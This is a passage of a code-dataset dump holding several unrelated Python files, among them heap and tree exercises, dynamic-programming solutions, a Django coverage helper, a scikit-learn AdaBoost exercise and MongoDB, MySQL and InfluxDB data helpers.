overlap ratio: overlap area / ROI area\n '''\n\n height, width = np.shape(grayImg)\n ROI1 = np.zeros((height, width))\n ROI2 = np.zeros((height, width))\n ROI1y1, ROI1x1 = ROI1P[0],ROI1P[1]\n ROI1y2, ROI1x2 = ROI1y1 + ROI1P[2], ROI1x1 + ROI1P[3]\n ROI2y1, ROI2x1 = ROI2P[0], ROI2P[1]\n ROI2y2, ROI2x2 = ROI2y1 + ROI2P[2], ROI2x1 + ROI2P[3]\n ROI1[ROI1y1:ROI1y2, ROI1x1:ROI1x2] = 0.4\n ROI2[ROI2y1:ROI2y2, ROI2x1:ROI2x2] = 0.4\n overlapArea = ROI1 * ROI2\n if if_show:\n\n cv2.namedWindow('ROI1',cv2.WINDOW_NORMAL)\n cv2.imshow('ROI1', ROI1)\n cv2.waitKey(0)\n cv2.namedWindow('ROI2',cv2.WINDOW_NORMAL)\n cv2.imshow('ROI2', ROI2)\n cv2.waitKey(0)\n cv2.namedWindow('overlap', cv2.WINDOW_NORMAL)\n cv2.imshow('overlap', ROI1+ROI2)\n cv2.waitKey(0)\n\n overlapRatio = np.count_nonzero(overlapArea)/(ROI1P[2]* ROI1P[3])\n\n return overlapRatio\n\n\n# Test\nif __name__ == '__main__':\n grayImg = cv2.cvtColor(cv2.imread('testImg.png'), cv2.COLOR_BGR2GRAY)\n ROI1P = [0,0,100,100]\n ROI2P = [50,50,100,100]\n overlapRatio = cal_overlap(ROI1P, ROI2P,grayImg)\n print(\"the overlap ratio is:\", overlapRatio)\n","sub_path":"code/data/overlap.py","file_name":"overlap.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"509072884","text":"from coverage import coverage\nimport re\n\nfrom django.conf import settings\nfrom django.utils.importlib import import_module\nfrom pkgutil import walk_packages\n\nfrom discoverage.settings import TESTED_APPS_VAR_NAME\n\nclass CoverageHandler(coverage):\n def __init__(self, suite, omit, excluded_patterns, module_name_app_discovery, module_name_discovery_pattern,\n pkg_name_app_discovery):\n super(CoverageHandler, self).__init__(omit=omit)\n self.suite = suite\n self.module_name_discovery_pattern = module_name_discovery_pattern\n self.module_name_app_discovery = module_name_app_discovery\n self.pkg_name_app_discovery = pkg_name_app_discovery\n\n for pattern in excluded_patterns:\n self.exclude(pattern)\n\n def __enter__(self):\n self.start()\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.stop()\n\n apps = self.find_coverage_apps()\n app_modules = self.get_all_modules(apps)\n\n self.actual_coverage_percent = self.report(app_modules)\n\n def get_apps(self, obj):\n return list(getattr(obj, TESTED_APPS_VAR_NAME, []))\n\n def find_coverage_apps(self):\n coverage_apps = set()\n inspected = set()\n app_pkgs = dict((app.split('.')[-1], app) for app in settings.INSTALLED_APPS)\n\n for test in self.suite:\n class_name = repr(test.__class__)\n\n if class_name in inspected:\n continue\n\n test_apps = self.get_apps(test)\n\n if test.__module__ not in inspected:\n test_module = import_module(test.__module__)\n test_apps.extend(self.get_apps(test_module))\n inspected.add(test.__module__)\n pkg = test_module.__package__\n\n if self.module_name_app_discovery:\n module_name = test.__module__.split(pkg + '.')[-1]\n\n try:\n guessed_app_name = re.match(self.module_name_discovery_pattern,\n module_name).group(1)\n test_apps.append(app_pkgs[guessed_app_name])\n except (KeyError, AttributeError, IndexError):\n pass\n\n if pkg not in inspected:\n test_pkg = import_module(pkg)\n test_apps.extend(self.get_apps(test_pkg))\n inspected.add(pkg)\n\n if self.pkg_name_app_discovery:\n subpkg = pkg.split('.')[-1]\n try:\n test_apps.append(app_pkgs[subpkg])\n except KeyError:\n pass\n\n inspected.add(class_name)\n coverage_apps.update(test_apps)\n\n return list(coverage_apps)\n\n def get_all_modules(self, apps):\n modules = set()\n\n 
for app in apps:\n app_module = import_module(app)\n modules.add(app_module)\n app_path = app_module.__path__\n\n for pkg_data in walk_packages(app_path, prefix=u'{0}.'.format(app)):\n current_module = import_module(pkg_data[1])\n modules.add(current_module)\n\n return list(modules)\n\n def report(self, app_modules):\n return super(CoverageHandler, self).report(app_modules)\n","sub_path":"discoverage/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"469103664","text":"# - Binary tree structure of a heap can be stored in an array by letting the left and right child of each node n\n# be at indices 2n + 1 and 2n + 2 respectively.\n# - If either index is out of range, there is no child node.\n# - Max heap property says: a parent node must be greater than or equal to its children.\n\n\nclass Heap:\n def __init__(self):\n self.storage = []\n\n def insert(self, value):\n # add value to the end of the array\n self.storage.append(value)\n # check that it's smaller than its parent\n inserted_node_index = len(self.storage) - 1\n parent_node_index = self.get_parent_index(inserted_node_index)\n # swapping = True\n while parent_node_index >= 0 and self.storage[inserted_node_index] > self.storage[parent_node_index]:\n # swapping: \n # if not, swap them, and check again\n temp = self.storage[parent_node_index]\n self.storage[parent_node_index] = self.storage[inserted_node_index]\n self.storage[inserted_node_index] = temp\n # swapping = self._bubble_up(inserted_node_index)\n\n inserted_node_index = parent_node_index\n # self.get_parent_index(inserted_node_index)\n parent_node_index = self.get_parent_index(inserted_node_index)\n\n # if it is, stop\n # (Call bubble_up, for test...?)\n self._bubble_up(0)\n\n def delete(self):\n # swap first element with last\n first = self.storage[0]\n self.storage[0] = self.storage[len(self.storage) - 1]\n self.storage[len(self.storage) - 1] = first\n\n # remove last element\n self.storage = self.storage[:-1]\n\n # check that new first element is larger than both its children\n # if it's not, swap it with the larger child\n # now check it against its children, and so on...\n index_to_check = 0\n # child_indices = self.get_child_indices(index_to_check)\n while index_to_check != None:\n # (child_indices[0] < len(self.storage) and child_indices[1] < len(self.storage)) and \\\n # (self.storage[index_to_check] < self.storage[child_indices[0]] or \n # self.storage[index_to_check] < self.storage[child_indices[1]]):\n index_to_check = self._sift_down(index_to_check)\n # child_indices = self.get_child_indices(index_to_check)\n \n return first\n\n def get_max(self):\n return self.storage[0]\n\n def get_size(self):\n return len(self.storage)\n\n def _bubble_up(self, index):\n parent_index = self.get_parent_index(index)\n\n if parent_index < 0:\n return\n\n if self.storage[parent_index] < self.storage[index]:\n temp = self.storage[parent_index]\n self.storage[parent_index] = self.storage[index]\n self.storage[index] = temp\n return True\n \n return False\n\n def _sift_down(self, index):\n child_indices = self.get_child_indices(index)\n if child_indices[0] >= len(self.storage) and child_indices[1] >= len(self.storage):\n return\n \n max_child_index = None\n if child_indices[1] >= len(self.storage):\n max_child_index = child_indices[0]\n else:\n max_child_index = child_indices[0] if self.storage[child_indices[0]] >= self.storage[child_indices[1]] else 
child_indices[1]\n \n self._bubble_up(max_child_index)\n\n return max_child_index\n\n # helpers\n def get_parent_index(self, index):\n return (index - 1) // 2 if index % 2 == 1 else (index - 2) // 2\n \n def get_child_indices(self, index):\n return (2*index + 1, 2*index + 2)\n","sub_path":"heap/max_heap.py","file_name":"max_heap.py","file_ext":"py","file_size_in_byte":3716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"104213951","text":"\"\"\"\nGiven an m x n grid filled with non-negative integers, find a path from the top-left corner to the bottom-right corner that minimizes the sum of the numbers along the path.\n\nNote: you can only move either down or right, one step at a time.\n\nhttps://leetcode-cn.com/problems/minimum-path-sum/\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def minPathSum(self, grid: List[List[int]]) -> int:\n # Optimization: the original grid array could be modified in place instead\n dp = [grid[0][0]]\n for i in range(1, len(grid[0])):\n dp.append(dp[i - 1] + grid[0][i])\n for i in range(1, len(grid)):\n v = grid[i]\n for j in range(len(v)):\n if i == 0:\n dp[0] += v[0]\n else:\n dp[j] = min(dp[j - 1], dp[j]) + v[j]\n return dp[-1]\n\n\ngrid = [[1, 3, 1], [1, 5, 1], [4, 2, 1]]\nprint(Solution().minPathSum(grid))\ngrid = [[1, 2, 3], [4, 5, 6]]\nprint(Solution().minPathSum(grid))\n\n\"\"\"\n\nAuthor: jyd\nLink: https://leetcode-cn.com/problems/minimum-path-sum/solution/zui-xiao-lu-jing-he-dong-tai-gui-hua-gui-fan-liu-c/\nSource: LeetCode (力扣)\nCopyright belongs to the author. For commercial reuse, please contact the author for authorization; for non-commercial reuse, please credit the source.\n\"\"\"\n\n\nclass Solution:\n def minPathSum(self, grid: [[int]]) -> int:\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if i == j == 0:\n continue\n elif i == 0:\n grid[i][j] = grid[i][j - 1] + grid[i][j]\n elif j == 0:\n grid[i][j] = grid[i - 1][j] + grid[i][j]\n else:\n grid[i][j] = min(grid[i - 1][j], grid[i][j - 1]) + grid[i][j]\n return grid[-1][-1]\n","sub_path":"algorithm/动态规划/64. 最小路径和.py","file_name":"64. 
最小路径和.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"546819841","text":"class Node(object):\n \"\"\"\n Node contains two objects - a left and a right child, both may be a Node or both None,\n latter representing a leaf\n \"\"\"\n\n def __init__(self, left=None, right=None):\n super(Node, self).__init__()\n self.left = left\n self.right = right\n\n def __str__(self):\n \"\"\"\n Default inorder print\n \"\"\"\n if self.left is None and self.right is None:\n return \"( )\"\n else:\n return \"( \" + str(self.left) + \" \" + str(self.right) + \" )\"\n\n def __eq__(self, other):\n if self.left is None and self.right is None:\n return other.left is None and other.right is None\n elif other.left is None and other.right is None:\n return False\n else:\n return self.left == other.left and self.right == other.right\n\n\ndef mirrorTree(node):\n \"\"\"\n Returns the mirror image of the tree rooted at node\n \"\"\"\n if node == Node():\n mirror_node = Node()\n else:\n mirror_node = Node(mirrorTree(node.right), mirrorTree(node.left))\n return mirror_node\n\n\ndef allTrees(n):\n \"\"\"\n Returns a list of all unique trees with n internal nodes\n \"\"\"\n if n == 0:\n return [Node()]\n\n trees = []\n for l_count in range(0, n):\n trees += [Node(x, y) for x in allTrees(l_count) for y in allTrees(n - 1 - l_count)]\n return trees\n\n\ndef allSymTrees(n):\n \"\"\"\n Returns a list of all unique symmetrical trees with n internal nodes\n \"\"\"\n if n == 0:\n return [Node()]\n elif n % 2:\n return [Node(sub_tree, mirrorTree(sub_tree)) for sub_tree in allTrees(n // 2)]\n else:\n return []\n\n\nif __name__ == '__main__':\n for x in allSymTrees(int(input())):\n print(x)\n node = Node(Node(Node(), Node()), Node())\n print(node)\n","sub_path":"Final/q4.py","file_name":"q4.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"566146038","text":"from collections import namedtuple\r\nfrom lib.compute import (compute_u_from_delta_p, compute_average_and_stdev,\r\n compute_delta_p_from_u)\r\n\r\nWindMeasures = namedtuple('wind_measures', [\r\n 't', 'Fx', 'Fy', 'Fz', 'Mx', 'My', 'Mz', 'p_ref', 'u_gil', 'p_rap'])\r\nWindProperties = namedtuple('WindProperties', [\r\n 'delta_p_ref',\r\n 'u_ref',\r\n 'delta_p_gil',\r\n 'u_gil',\r\n 'alpha_u_ref_gil',\r\n 'alpha_p_ref_gil',\r\n])\r\n\r\n\r\ndef sanitize_wind_measures(wind_measures):\r\n return [\r\n (t, p_ref, u_gil)\r\n for (t, Fx, Fy, Fz, Mx, My, Mz, p_ref, u_gil, p_rap) in wind_measures\r\n if p_ref > 0 and u_gil > 0\r\n ]\r\n\r\n\r\ndef compute_wind_measures(wind_measures, rho, k_ref):\r\n u_measures = [\r\n (\r\n t,\r\n p_ref,\r\n compute_u_from_delta_p(p_ref, rho)*k_ref,\r\n compute_delta_p_from_u(u_gil, rho),\r\n u_gil,\r\n )\r\n for (t, p_ref, u_gil) in wind_measures\r\n ]\r\n\r\n alpha_measures = [\r\n (\r\n t,\r\n u_ref/u_gil,\r\n p_ref/p_gil,\r\n\r\n )\r\n for (t, p_ref, u_ref, p_gil, u_gil) in u_measures\r\n ]\r\n\r\n (p_ref_average, _) = compute_average_and_stdev(\r\n [float(p_ref) for (_, p_ref, _) in wind_measures])\r\n (u_ref_average, _) = compute_average_and_stdev(\r\n [float(u_ref) for (_, _, u_ref, _, _) in u_measures])\r\n (p_gil_average, _) = compute_average_and_stdev(\r\n [float(p_gil) for (_, _, _, p_gil, _) in u_measures])\r\n (u_gil_average, _) = compute_average_and_stdev(\r\n [float(u_gil) for (_, _, u_gil) in wind_measures])\r\n (alpha_u_ref_gil_average, 
_) = compute_average_and_stdev(\r\n [float(alpha_u_ref_gil) for (_, alpha_u_ref_gil, _) in alpha_measures])\r\n (alpha_p_ref_gil_average, _) = compute_average_and_stdev(\r\n [float(alpha_p_ref_gil) for (_, _, alpha_p_ref_gil) in alpha_measures])\r\n\r\n return [WindProperties(p_ref_average, u_ref_average, p_gil_average, u_gil_average,\r\n alpha_u_ref_gil_average, alpha_p_ref_gil_average,)]\r\n\r\n\r\ndef convert_raw_str_value_to_float(str):\r\n return float(str.replace(',', '.'))\r\n\r\n\r\nclass wind_measure_model:\r\n def __init__(self, rho, k_ref):\r\n # interface model\r\n self.parsing_output_model = lambda t, Fx, Fy, Fz, Mx, My, Mz, p_ref, u_gil, p_rap: WindMeasures(\r\n t, Fx, Fy, Fz, Mx, My, Mz, convert_raw_str_value_to_float(p_ref), convert_raw_str_value_to_float(u_gil), p_rap)\r\n self.sanitize = lambda measures_to_sanitize: sanitize_wind_measures(\r\n measures_to_sanitize)\r\n self.compute = lambda measures_to_compute: compute_wind_measures(\r\n measures_to_compute, rho, k_ref)\r\n\r\n # specific wind_measure_model fields\r\n self.rho = rho\r\n self.k_ref = k_ref\r\n","sub_path":"models/wind_measure.py","file_name":"wind_measure.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"48600031","text":"import lxml.html\nimport urllib.request\nimport urllib.error\nimport re\nfrom webScr16 import download as download\n#from link_crawler import link_crawler\nFIELDS = ('area', 'population', 'iso', 'country', 'capital', 'continent', 'tld', 'currency_code', 'currency_name', 'phone', 'postal_code_format', 'postal_code_regex', 'languages', 'neighbours')\ndef scrape_callback(url,html):\n if re.search('/view/',url):\n tree=lxml.html.fromstring(html)\n row = [tree.cssselect('table>tr#places_%s__row>td.w2p_fw'%field)[0].text_content()for field in FIELDS]\n print (url)\n for item in row:\n print (item)\n\n\n\n\nif __name__=='__main__':\n url='http://example.webscraping.com/places/view/United-Kindom-239'\n html=download(url)\n links=[]\n # link_crawler('http://example.webscraping.com','/(index|view)',scrape_callback)\n links.extend(scrape_callback(url,html)or [])","sub_path":"SrcWeb2-2-6.py","file_name":"SrcWeb2-2-6.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"47911882","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n#Book P14. 
copyright by Mr Kang\r\n#2021/10/23 \r\nfrom pandas import read_csv\r\nimport matplotlib.pyplot as plt\r\nfilename='pima.csv'\r\n#names=['pre','glu','plas','skin','test','mass','pedi','age','class']\r\ndata=read_csv(filename)\r\npeek=data.head(10)\r\nprint(peek)\r\nprint(data.skew())\r\ndata.hist()\r\nplt.show()\r\n#data.plot(kind='density',subplots=True,layout=(3,3),sharex=False)\r\n#plt.show()","sub_path":"scipy.py","file_name":"scipy.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"209393369","text":"class handler:\n def __init__(self, influxHost, username, password, database, topic, influxPort=8086):\n from influxdb import InfluxDBClient\n import logging\n import traceback\n\n self.influxClient = InfluxDBClient(\n influxHost, influxPort, username, password)\n self.influxClient.switch_database(database)\n\n self.logging = logging\n self.traceback = traceback\n self.logging.basicConfig(filename=\"error.log\")\n\n self.topic = topic\n self.status_checker = []\n\n switch = {\n \"ph\": \"pH\",\n \"tb\": \"NTU\",\n \"temp\": \"Celsius\",\n \"do\":\"mg/L\"\n }\n self.unit = switch.get(topic, \"No unit\")\n del switch\n\n self.value_serializer = self.json_serializer(self.topic, self.unit)\n self.status_serializer = self.json_serializer(\n \"{}_status\".format(self.topic), self.unit)\n\n def json_serializer(self, measurement, tag):\n def serialize(field):\n return {\n \"measurement\": measurement,\n \"tags\": {\n \"unit\": tag\n },\n \"fields\": {\n \"value\": field\n }\n }\n return serialize\n\n def dbsend(self, recieved_list):\n try:\n self.influxClient.write_points(\n getattr(handler, recieved_list[\"status\"])(\n self, [], recieved_list),\n time_precision='ms', protocol='json')\n# second parameter of getattr must always be empty list since the function needs an empty lists\n except Exception as e:\n print(\"failed to write to DB topic %s\" % self.topic)\n print(e)\n self.logging.error(self.traceback.format_exc())\n\n def sending(self, *args):\n args[0].append(self.value_serializer(args[1][\"value\"]))\n if len(self.status_checker) < 1:\n args[0].append(self.status_serializer(\"connected\"))\n self.status_checker.append(\"placeholder\")\n return args[0]\n\n def connected(self, *args):\n self.status_checker.append(\"placeholder\")\n if len(self.status_checker) == 1:\n args[0].append(self.status_serializer(\"connected\"))\n print(\"connected %s\" % self.topic)\n return args[0]\n\n def disconnected(self, *args):\n try:\n self.status_checker.pop(0)\n except:\n pass\n if len(self.status_checker) < 1:\n args[0].append(self.status_serializer(\"disconnected\"))\n print(\"disconnected %s\" % self.topic)\n return args[0]\n","sub_path":"influxHandler_v1.py","file_name":"influxHandler_v1.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"84752759","text":"# %% [markdown]\n# # 📃 Solution for Exercise M6.03\n#\n# This exercise aims at verifying if AdaBoost can over-fit.\n# We will make a grid-search and check the scores by varying the\n# number of estimators.\n#\n# We will first load the California housing dataset and split it into a\n# training and a testing set.\n\n# %%\nfrom sklearn.datasets import fetch_california_housing\nfrom sklearn.model_selection import train_test_split\n\ndata, target = fetch_california_housing(return_X_y=True, as_frame=True)\ntarget *= 100 # rescale the target in k$\ndata_train, 
data_test, target_train, target_test = train_test_split(\n data, target, random_state=0, test_size=0.5)\n\n# %% [markdown]\n# ```{note}\n# If you want a deeper overview regarding this dataset, you can refer to the\n# Appendix - Datasets description section at the end of this MOOC.\n# ```\n\n# %% [markdown]\n# Then, create an `AdaBoostRegressor`. Use the function\n# `sklearn.model_selection.validation_curve` to get training and test scores\n# by varying the number of estimators.\n# *Hint: vary the number of estimators between 1 and 60.*\n\n# %%\nimport numpy as np\nfrom sklearn.ensemble import AdaBoostRegressor\nfrom sklearn.model_selection import validation_curve\n\nadaboost = AdaBoostRegressor()\nparam_range = np.unique(np.logspace(0, 1.8, num=30).astype(int))\ntrain_scores, test_scores = validation_curve(\n    adaboost, data_train, target_train, param_name=\"n_estimators\",\n    param_range=param_range, n_jobs=-1)\n\n# %% [markdown]\n# Plot both the mean training and test scores. You can also plot the\n# standard deviation of the scores.\n\n# %%\nimport matplotlib.pyplot as plt\n\nplt.errorbar(param_range, train_scores.mean(axis=1),\n             yerr=train_scores.std(axis=1), label=\"Training score\",\n             alpha=0.7)\nplt.errorbar(param_range, test_scores.mean(axis=1),\n             yerr=test_scores.std(axis=1), label=\"Cross-validation score\",\n             alpha=0.7)\n\nplt.legend()\nplt.ylabel(\"$R^2$ score\")\nplt.xlabel(\"# estimators\")\n_ = plt.title(\"Validation curve for AdaBoost regressor\")\n\n# %% [markdown]\n# Plotting the validation curve, we can see that AdaBoost is not immune to\n# overfitting. Indeed, there is an optimal number of estimators to be found.\n# Adding too many estimators is detrimental to the performance of the model.\n\n# %% [markdown]\n# Repeat the experiment using a random forest instead of an AdaBoost regressor.\n\n# %%\nfrom sklearn.ensemble import RandomForestRegressor\n\nforest = RandomForestRegressor()\ntrain_scores, test_scores = validation_curve(\n    forest, data_train, target_train, param_name=\"n_estimators\",\n    param_range=param_range, n_jobs=-1)\n\n# %%\nplt.errorbar(param_range, train_scores.mean(axis=1),\n             yerr=train_scores.std(axis=1), label=\"Training score\",\n             alpha=0.7)\nplt.errorbar(param_range, test_scores.mean(axis=1),\n             yerr=test_scores.std(axis=1), label=\"Cross-validation score\",\n             alpha=0.7)\n\nplt.legend()\nplt.ylabel(\"$R^2$ score\")\nplt.xlabel(\"# estimators\")\n_ = plt.title(\"Validation curve for RandomForest regressor\")\n\n# %% [markdown]\n# In contrast to the AdaBoost regressor, we can see that increasing the number of\n# trees in the forest will increase the statistical performance of the random\n# forest. 
In fact, a random forest has less chance to suffer from overfitting\n# than AdaBoost when increasing the number of estimators.\n","sub_path":"python_scripts/ensemble_sol_03.py","file_name":"ensemble_sol_03.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"409896800","text":"\n\nimport pymysql\n\ndb = pymysql.connect('localhost', 'root', '123456',\n 'dict_pro', charset='utf8')\ncursor = db.cursor()\n\n# sql = 'create table user(\\\n# id int primary key auto_increment,\\\n# name varchar(20),\\\n# passwd varchar(16)\\\n# ) default charset=utf8;'\n\n# sql = 'create table record(\\\n# id int primary key auto_increment,\\\n# word varchar(32),\\\n# time timestamp,\\\n# user_id int,\\\n# foreign key(user_id) references user(id)\\\n# on delete cascade\\\n# on update cascade\\\n# ) default charset=utf8;'\n\nsql = 'create table dict(\\\n id int primary key auto_increment,\\\n word varchar(32),\\\n interpret varchar(300)\\\n ) default charset=utf8;'\n\ncursor.execute(sql)\n\ndb.commit()\ncursor.close()\ndb.close()\n","sub_path":"Project/Ele_Dict/v1_0/init_db/creat_usedb.py","file_name":"creat_usedb.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"594608428","text":"from .. import models\nfrom .. import common\nimport qmongo\ndef display_list_job_working(group_code):\n ret=qmongo.models.HCSLS_JobWorking.aggregate\n ret.join(qmongo.models.HCSLS_JobWorkingGroup, \"gjw_code\", \"gjw_code\", \"jwg\")\n ret.left_join(qmongo.models.HCSEM_Employees, \"report_to_job_w\", \"employee_code\", \"emp\")\n if group_code != None and group_code != \"\":\n ret.match('jwg.level_code == {0}', group_code)\n ret.project(\n job_w_code=\"job_w_code\",\n job_w_name=\"job_w_name\",\n report_to_job_w=\"emp.last_name + emp.first_name\",\n lock = \"lock\",\n ordinal=\"ordinal\"\n )\n ret.sort(dict(\n ordinal = 1\n ))\n\n return ret\n\ndef get_job_working_group_by_group_code(gjw_code):\n rs = qmongo.models.HCSLS_JobWorkingGroup.aggregate.project(gjw_code = 1, gjw_name = 1, ordinal = 1).match(\"gjw_code == {0}\", gjw_code).sort({\"ordinal\":1}).get_item()\n return rs\n\ndef get_job_description_by_job_working_code(job_w_code):\n ret=qmongo.models.HCSLS_JobWorking.aggregate\n ret.join(qmongo.models.HCSLS_JobWorkingGroup, \"gjw_code\", \"gjw_code\", \"gjw\")\n ret.left_join(qmongo.models.auth_user_info, \"created_by\", \"username\", \"uc\")\n ret.left_join(qmongo.models.auth_user_info, \"modified_by\", \"username\", \"um\")\n ret.project(\n job_w_code=\"job_w_code\",\n job_w_name=\"job_w_name\",\n job_w_name2=\"job_w_name2\",\n gjw_code=\"gjw_code\",\n gjw_name=\"gjw.gjw_name\",\n effect_date=\"effect_date\",\n job_pos_code=\"job_pos_code\",\n is_job_w_main_staff=\"is_job_w_main_staff\",\n report_to_job_w=\"report_to_job_w\",\n dept_contact=\"dept_contact\",\n dept_apply=\"dept_apply\",\n job_w_next=\"job_w_next\",\n job_w_change=\"job_w_change\",\n description=\"description\",\n job_w_duty=\"job_w_duty\",\n ordinal=\"ordinal\",\n lock=\"lock\",\n created_by=\"uc.login_account\",\n created_on=\"created_on\",\n modified_on=\"switch(case(modified_on!='',modified_on),'')\",\n modified_by=\"switch(case(modified_by!='',um.login_account),'')\",\n )\n ret.match(\"job_w_code == {0}\", job_w_code)\n ret.sort(dict(\n ordinal = 1\n ))\n\n return ret\n\ndef get_list_permission_and_mission_by_job_working_code(job_w_code,search_text):\n 
ret=qmongo.models.HCSLS_JobWorking.aggregate\n ret.match(\"job_w_code == {0}\", job_w_code)\n ret.unwind(\"task\")\n ret.left_join(qmongo.models.auth_user_info, \"created_by\", \"username\", \"uc\")\n ret.left_join(qmongo.models.auth_user_info, \"modified_by\", \"username\", \"um\")\n ret.project(\n job_w_code=\"job_w_code\",\n rec_id =\"task.rec_id\",\n task_name=\"task.task_name\",\n weight=\"task.weight\",\n description=\"task.description\",\n ordinal=\"task.ordinal\",\n created_by=\"uc.login_account\",\n created_on=\"task.created_on\",\n modified_on=\"switch(case(task.modified_on!='',task.modified_on),'')\",\n modified_by=\"switch(case(task.modified_by!='',um.login_account),'')\",\n )\n if(search_text!= None and search_text!= ''):\n ret.match(\"contains(task_name,{0}) or contains(description,{0})\",search_text)\n ret.match(\"task_name != {0}\", None)\n ret.sort(dict(\n ordinal = 1\n ))\n\n return ret\n\ndef insert_job_description(args, task):\n collection = common.get_collection('HCSLS_JobWorking')\n ret = collection.update(\n { \"job_w_code\": args['data']['job_w_code'] },\n {\n '$push': {\n \"task\": task\n }\n }\n )\n return ret\n\ndef insert_job_kpi(args, task):\n collection = common.get_collection('HCSLS_JobWorking')\n ret = collection.update(\n { \"job_w_code\": args['data']['job_w_code'] },\n {\n '$push': {\n \"kpi\": task\n }\n }\n )\n return ret\n\ndef remove_job_description(args):\n collection = common.get_collection('HCSLS_JobWorking')\n ret = collection.update(\n {\n \"job_w_code\": args['data']['job_w_code']\n },\n {\n '$pull':{\"task\" :{ \"rec_id\": {'$in': args['data']['rec_id']}}}\n }, \n True\n )\n return ret\n\ndef remove_kpi(args):\n collection = common.get_collection('HCSLS_JobWorking')\n ret = collection.update(\n {\n \"job_w_code\": args['data']['job_w_code']\n },\n {\n '$pull':{\"kpi\" :{ \"rec_id\": {'$in': args['data']['rec_id']}}}\n }, \n True\n )\n return ret\n\ndef update_job_description(args, task):\n collection = common.get_collection('HCSLS_JobWorking')\n ret = collection.update(\n {\n \"job_w_code\": args['data']['job_w_code'],\n \"task\":{\n \"$elemMatch\":{\n \"rec_id\":args['data']['task'][\"rec_id\"]\n }\n }\n },\n {\n \"$set\": {\n 'task.$.task_name': task['task_name'],\n 'task.$.weight': task['weight'],\n 'task.$.description': task['description'],\n 'task.$.ordinal': task['ordinal'],\n 'task.$.modified_by': task['modified_by'],\n 'task.$.modified_on': task['modified_on']\n }\n })\n return ret\n\ndef update_job_kpi(args, kpi):\n collection = common.get_collection('HCSLS_JobWorking')\n ret = collection.update(\n {\n \"job_w_code\": args['data']['job_w_code'],\n \"kpi\":{\n \"$elemMatch\":{\n \"rec_id\":args['data']['kpi'][\"rec_id\"]\n }\n }\n },\n {\n \"$set\": {\n 'kpi.$.kpi_name': kpi['kpi_name'],\n 'kpi.$.ordinal': kpi['ordinal'],\n 'kpi.$.unit': kpi['unit'],\n 'kpi.$.cycle': kpi['cycle'],\n 'kpi.$.weight': kpi['weight'],\n 'kpi.$.modified_by': kpi['modified_by'],\n 'kpi.$.modified_on': kpi['modified_on']\n }\n })\n return ret\n\ndef insert_evaluation_factor(args, factor_appraisal):\n collection = common.get_collection('HCSLS_JobWorking')\n ret = collection.update(\n { \"job_w_code\": args['data']['job_w_code'] },\n {\n '$push': {\n \"factor_appraisal\": factor_appraisal\n }\n }\n )\n return ret\n\ndef update_evaluation_factor(args, factor_appraisal):\n collection = common.get_collection('HCSLS_JobWorking')\n ret = collection.update(\n {\n \"job_w_code\": args['data']['job_w_code'],\n \"factor_appraisal\":{\n \"$elemMatch\":{\n 
\"rec_id\":args['data']['factor_appraisal'][\"rec_id\"]\n }\n }\n },\n {\n \"$set\": {\n 'factor_appraisal.$.factor_code': factor_appraisal['factor_code'],\n 'factor_appraisal.$.weight': factor_appraisal['weight'],\n 'factor_appraisal.$.modified_by': factor_appraisal['modified_by'],\n 'factor_appraisal.$.modified_on': factor_appraisal['modified_on']\n }\n })\n return ret\n\ndef delete_evaluation_factor(args):\n collection = common.get_collection('HCSLS_JobWorking')\n ret = collection.update(\n {\n \"job_w_code\": args['data']['job_w_code']\n },\n {\n '$pull':{\"factor_appraisal\" :{ \"rec_id\": {'$in': args['data']['rec_id']}}}\n }, \n True\n )\n return ret\n\ndef get_list_job_specific_by_job_working_code(job_w_code):\n pass\n\ndef get_list_evaluation_factor_by_job_working_code(job_w_code):\n ret=qmongo.models.HCSLS_JobWorking.aggregate\n ret.match(\"job_w_code == {0}\", job_w_code)\n ret.unwind(\"factor_appraisal\")\n ret.join(qmongo.models.TMLS_FactorAppraisal, \"factor_appraisal.factor_code\", \"factor_code\", \"fac\")\n ret.join(qmongo.models.TMLS_FactorAppraisalGroup, \"fac.factor_group_code\", \"factor_group_code\", \"fac_g\")\n ret.left_join(qmongo.models.auth_user_info, \"created_by\", \"username\", \"uc\")\n ret.left_join(qmongo.models.auth_user_info, \"modified_by\", \"username\", \"um\")\n ret.project(\n job_w_code=\"job_w_code\",\n rec_id =\"factor_appraisal.rec_id\",\n factor_code=\"factor_appraisal.factor_code\",\n factor_name=\"fac.factor_name\",\n factor_group_name=\"fac_g.factor_group_name\",\n weight=\"factor_appraisal.weight\",\n created_by=\"uc.login_account\",\n created_on=\"factor_appraisal.created_on\",\n modified_on=\"switch(case(factor_appraisal.modified_on!='',factor_appraisal.modified_on),'')\",\n modified_by=\"switch(case(factor_appraisal.modified_by!='',um.login_account),'')\",\n )\n ret.match(\"factor_code != {0}\", None)\n ret.sort(dict(\n ordinal = 1\n ))\n\n return ret\n\ndef get_evaluation_file_by_job_working_code(job_w_code):\n 